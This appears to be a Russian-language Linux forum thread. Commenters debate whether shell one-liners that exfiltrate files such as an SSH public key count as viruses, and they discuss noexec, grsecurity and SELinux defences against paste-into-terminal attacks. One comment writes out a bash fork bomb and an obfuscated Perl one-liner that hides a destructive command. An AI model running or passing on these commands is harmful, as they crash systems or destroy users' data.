А что собственно такого в id_rsa.pub? Да пусть забирает, не жалко как-то.

Вот есть вопрос, можно ли подобные штуки называть вирусами, в широком смысле(все что вредоносное, а не то что вирус по определению)?

Ну, тогда

 :(){ :|:& };:

И это тоже

cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see' 

?

//P.S.: это плохая идея...

А что собственно такого в id_rsa.pub? Да пусть забирает, не жалко как-то.

в примере это не принципиально

Нет, это не вирус. пользователь сам его запустил, ССЗБ.

Ну, тогда

Не, не покатит. Этот код размножаться (в т.ч. при участии пользователя) не умеет. Так что ни по какой классификации — не вирус :)

Нет, это не вирус. пользователь сам его запустил, ССЗБ.

Если не считать вирусом то, что пользователь не запускает, то вирусов вообще не существует :) Кроме червей, но тут тоже настаивают, что они — не вирусы :D

Такая, вот, нестройность новых определений…

Ну так и то что в топике тоже.

Да, то, что в топикcтарте — тоже не вирус :)

к тому же в некоторых популярных локал рут эксплойтах для ведра был реализован обход selinux

когда твои однострочники начнут размножаться и распространяться, тогда они и станут вирусами.

Если не считать вирусом то, что пользователь не запускает, то вирусов вообще не существует :) Кроме червей

браузерный эксплойтом грузим лоадер пользователю - пользователь его не запускает сам, но это и не червь, и не вирус

пользователь его не запускает сам

Так пользователь не запускает и «классический» вирус, прицепившийся к .exe-шнику. Пользователь запускает прикладную программу. Как и открывает страницу сайта.

Эксплойт это эксплойт, а вот нагрузкой его может быть не только банальный реверс-шелл, но и какой-нибудь Flame

само собой

Правила безопасности:

1. Всё что исполняется не должно изменятся.

2. Все что изменяется не должно исполнятся.

Понимаешь?

/ /usr - ro

/tmp /home /var - noexec

Плюс ядро с патчем grsecurity которое постранично разделит память на исполняемую и не изменяемую и изменяемую но не исполняемую.

99,9% вирей разных мастей сосут...

политика запрещено все что не разрешено. Ее впооне можно было бы сделать.

Так. Ещё раз. Строка в ОП-посте — явный претендент на встраивание в короткий скрипт, который копипастят из браузера в консоль. Её можно скрыть. Ты НЕ МОЖЕШЬ ограничить пользовательскую интерактивную консоль и основные утилиты из coreutils политиками (если можешь — пожалуйста, приведи пример) так, чтобы ей вообще можно было пользоваться. Если ты вообще юзал хоть какой-нибудь MAC.

положим .ssh ему не нужна, а только клиенту ssh.
часть утилит таки можно ограничить.
если есть конфигуратор всего то консоль не нужна. Её можно оставить для специального пользователя.
При желании можно и от копипаста отчасти защититься. Выполнять команду только по нажатию клавиши, а не из за переводов строки во вставляемом тексте. Тогда хотя бы будет видно что выполняешь до начала, а не после.

Окау. Запусти теперь steam://

При желании можно и от копипаста отчасти защититься. Выполнять команду только по нажатию клавиши, а не из за переводов строки во вставляемом тексте.

Для этого нужно переделать архитектуру терминала. Это потребует, мягко говоря, дофига человекочасов. Быстрый эмуляторозависимый костыль, конечно, не настолько много усилий требует (распознавание вставки + curses или подобная софтина внутри, заточенная именно под этот эмулятор терминала именно под этот юзкейс), но им будет пользоваться 3.5 человека. Тут должна была быть реклама терминала plan9, но мне её не оплачивали.

положим .ssh ему не нужна, а только клиенту ssh.

Уверен? У меня как минимум трём программам оно постоянно нужно, одна из них — git. Бэкапы можно не считать, конечно, политика под них элементарна, но если ограничить базовые возможности в интерактивной консоли — пользователи взвоют. Особенно с SELinux.

Попробуй описать, что разрешить (не запретить, поскольку MAC — не средство для запрета, да и все случаи не предусмотришь) самому шеллу. Написать на чистом ksh/bash/zsh без единой внешней утилиты отправку любого файла — элементарно. А шеллом люди часто руками копируют/грепают/sed'ят те же самые чувствительные файлы

А накойхрен злоумышленнику мой публичный ключ ssh?

А накойхрен злоумышленнику мой публичный ключ ssh?

Уже писал, что просто пример идеи самой. Естественно так можно отправить любой файл, до которого есть доступ у пользователя

И, да, биологические вирусы не способны к саморепликции/размножению.

Хочешь сказать, их четко фиксированное число в мире? :)

Wikipedia — не истина в первой инстанции :)

Вирус - самораспротраняется, а по доставке троянов парится их хозяин. Так в общем-то всегда было.

Вирус - самораспротраняется

Нет. Биологические вирусы не сами размножаются. Они, вообще, не живые. Их размножает заражённая клетка. Так что биологический вирус — типичный троянский конь. Клетка его принимает за корректную информацию, но ошибается.

Нет. Биологические вирусы не сами размножаются. Они, вообще, не живые. Их размножает заражённая клетка. Так что биологический вирус — типичный троянский конь. Клетка его принимает за корректную информацию, но ошибается.

Ок. Но тем не менее, клетка его начинает после этого распространять. Либо вырабатывать. В компьютерном мире - нет.

Ок. Но тем не менее, клетка его начинает после этого распространять. Либо вырабатывать. В компьютерном мире - нет.

Ну да. Любая аналогия развивается только в ограниченном диапазоне.

Вот только, как я писал выше, если мы отказываем вирусу в праве саморазмножения при прямом запуске пользователем, то аналогично надо отказать в саморазмножении и при косвенном запуске пользователем же. Ибо если пользователь не запустить заражённую программу, как начнёт размножаться вирус?

И, наоборот, совершенно спокойно реально саморазмножающиеся _черви_ по новой классификации — именно отдельный класс вредоносных программ, а не вирусы.

В общем, как ни крути, но новая классификация крайне нелогична. Она порождение не адекватной классификации, а снобизма «честных вирусописателей» (собственно, я наблюдал начало этого процесса).

Обнаружена уязвимость в ядре Linux от 2.6.37 до 3.8.10 (комментарий)